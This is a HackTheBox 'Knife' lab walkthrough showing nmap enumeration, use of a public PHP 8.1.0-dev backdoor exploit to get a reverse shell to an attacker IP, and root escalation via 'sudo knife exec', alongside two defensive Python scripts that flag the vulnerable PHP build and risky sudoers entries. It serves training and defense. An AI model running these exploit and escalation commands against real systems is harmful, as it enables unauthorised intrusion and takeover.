HTB Walkthrough : Knife

Today we are going to solve another challenge from HackTheBox, known as "Knife", designed by mrkn16h7. This lab is based on a PHP vulnerability, so without wasting too much time let's start the journey.

Level : Easy

Attacking Strategy

  • Network scanning
    • Nmap
  • Recon
    • PHP Version
  • Exploitation
    • PHP 8.1.0 RCE
  • Privilege Escalation
    • Sudoers over knife

Walkthrough

IP address : 10.10.10.242

We start with an Nmap scan of all ports to enumerate the open ports and services on the target.

Enumeration

nmap -p- -sC -sV 10.10.10.242
Nmap scan report for 10.10.10.242
Host is up (0.095s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Recon

From the scan we learn that two ports are open, port 22 and port 80, and the HTTP title suggests some medical-field project. While enumerating the HTTP service we obtained the PHP version, 8.1.0-dev, which is vulnerable to RCE.
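The recon step above boils down to reading the PHP version the web server advertises and recognising 8.1.0-dev as the tampered development build. The following script is an added example, not part of the original write-up or of any tool it uses: it parses a constructed HTTP response, pulls the version out of the X-Powered-By header (an assumption about how the version is exposed; Apache/PHP send it unless expose_php is disabled) and rates it for an asset inventory, so a defender can sweep their own hosts for the same build.

```python
import re
from typing import Dict, Optional, Tuple

# Constructed sample: the header block of an HTTP response as a server running
# the tampered PHP 8.1.0-dev build might return it. The X-Powered-By header is
# an assumption about how the version is advertised.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Mon, 31 May 2021 12:00:00 GMT\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/8.1.0-dev\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><title>Emergent Medical Idea</title></html>"
)

# The PHP build the walkthrough names as the RCE target.
BACKDOORED_BUILD = "8.1.0-dev"


def parse_response_headers(raw: str) -> Dict[str, str]:
    """Split a raw HTTP response into a lower-cased header name -> value map."""
    head, _, _body = raw.partition("\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def php_version_from_headers(headers: Dict[str, str]) -> Optional[str]:
    """Return the PHP version string advertised in X-Powered-By, or None."""
    value = headers.get("x-powered-by", "")
    m = re.search(r"PHP/([0-9]+(?:\.[0-9]+)*(?:-[A-Za-z0-9]+)?)", value)
    return m.group(1) if m else None


def assess_php_version(version: Optional[str]) -> Tuple[str, str]:
    """Map an advertised PHP version to a (severity, reason) pair."""
    if version is None:
        return ("unknown", "no PHP version advertised (expose_php may be off)")
    if version == BACKDOORED_BUILD:
        return ("critical", f"PHP {version} is the tampered development build with a remote code execution backdoor")
    if version.endswith("-dev"):
        return ("high", f"PHP {version} is a development build, not a release")
    return ("info", f"PHP {version} advertised; compare against release advisories")


def assess_response(raw: str) -> Tuple[Optional[str], str, str]:
    """Convenience wrapper: raw response -> (version, severity, reason)."""
    version = php_version_from_headers(parse_response_headers(raw))
    severity, reason = assess_php_version(version)
    return (version, severity, reason)


if __name__ == "__main__":
    print(assess_response(SAMPLE_RESPONSE))
```

On a real host, feed it the header block returned by a HEAD request to each web server you own; a "critical" result means the box is running the same build the walkthrough exploits and should be rebuilt from a clean PHP release.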

Exploitation

After some googling, we find an exploit available on GitHub. PHP 8.1.0-dev contains a remote code execution backdoor: an attacker can execute arbitrary code through the User-Agent header.

git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce.git
cd php-8.1.0-dev-backdoor-rce
ls
python revshell_php_8.1.0-dev.py Remote_host Attacker_ip Listen_port
python revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.73 1234

Once the exploit succeeds we get a shell on the netcat listener on port 1234. After receiving the shell we upgrade it to a proper TTY and export the shell and other environment variables.

sudo nc -lvnp 1234
id

Privilege Escalation

Now it's time to get root, so we start with the sudoers entries, and here the knife program can be run without a password. knife is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server. It can also execute commands through its exec subcommand.

sudo -l
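The sudoers finding above is the kind of thing a host audit should catch before an attacker does. The script below is an added example, not part of the original write-up: it parses a constructed sample of `sudo -l` output, extracts each command entry with its run-as user and tags, and rates NOPASSWD entries, treating knife as critical because (as the walkthrough notes) its exec subcommand runs arbitrary code. The CODE_EXEC_BINARIES map is an assumption to be extended for your own fleet.

```python
import os
import re
from typing import Dict, List

# Constructed sample of `sudo -l` output, modelled on the sudoers entry the
# walkthrough describes: knife runnable as root without a password.
SAMPLE_SUDO_L = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

# Binaries whose documented subcommands run arbitrary code. Assumption: this is
# a starting list, extend it for the tools installed on your own hosts.
CODE_EXEC_BINARIES: Dict[str, str] = {
    "knife": "'knife exec' evaluates Ruby, so it can spawn a shell as the run-as user",
}

# One sudo command entry: "(runas) TAG: TAG: /path/one, /path/two"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)\s*$")


def parse_sudo_l(output: str) -> List[Dict[str, object]]:
    """Extract the command entries (run-as user, tags, command) from `sudo -l` output."""
    entries: List[Dict[str, object]] = []
    in_commands = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True  # everything after this header is a command entry
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                entries.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": cmd})
    return entries


def audit_sudo_entries(entries: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Rate each entry: ALL and code-executing binaries are critical, other NOPASSWD entries high."""
    findings = []
    for e in entries:
        cmd = str(e["cmd"])
        tags = list(e["tags"])  # type: ignore[arg-type]
        nopasswd = "NOPASSWD" in tags
        binary = "ALL" if cmd == "ALL" else os.path.basename(cmd.split()[0])
        if cmd == "ALL":
            severity, reason = "critical", "any command may be run as the run-as user"
        elif binary in CODE_EXEC_BINARIES:
            severity, reason = "critical", CODE_EXEC_BINARIES[binary]
        elif nopasswd:
            severity, reason = "high", "runs without a password; confirm the binary cannot escape to a shell"
        else:
            severity, reason = "info", "password required"
        findings.append({"cmd": cmd, "runas": e["runas"], "nopasswd": nopasswd,
                         "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_entries(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[{f['severity']}] ({f['runas']}) {f['cmd']}: {f['reason']}")
```

Run it against the captured output of `sudo -l` for each service account; the fix for a critical finding here is to remove the rule or restrict it to a wrapper that cannot reach knife's exec subcommand, since a NOPASSWD rule for a code-executing tool is equivalent to passwordless root.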

After reading some information about knife we proceeded to execute bash as root.

sudo /usr/bin/knife exec -E 'system("/bin/bash")'
cd /root
cat root.txt
cat /home/james/user.txt
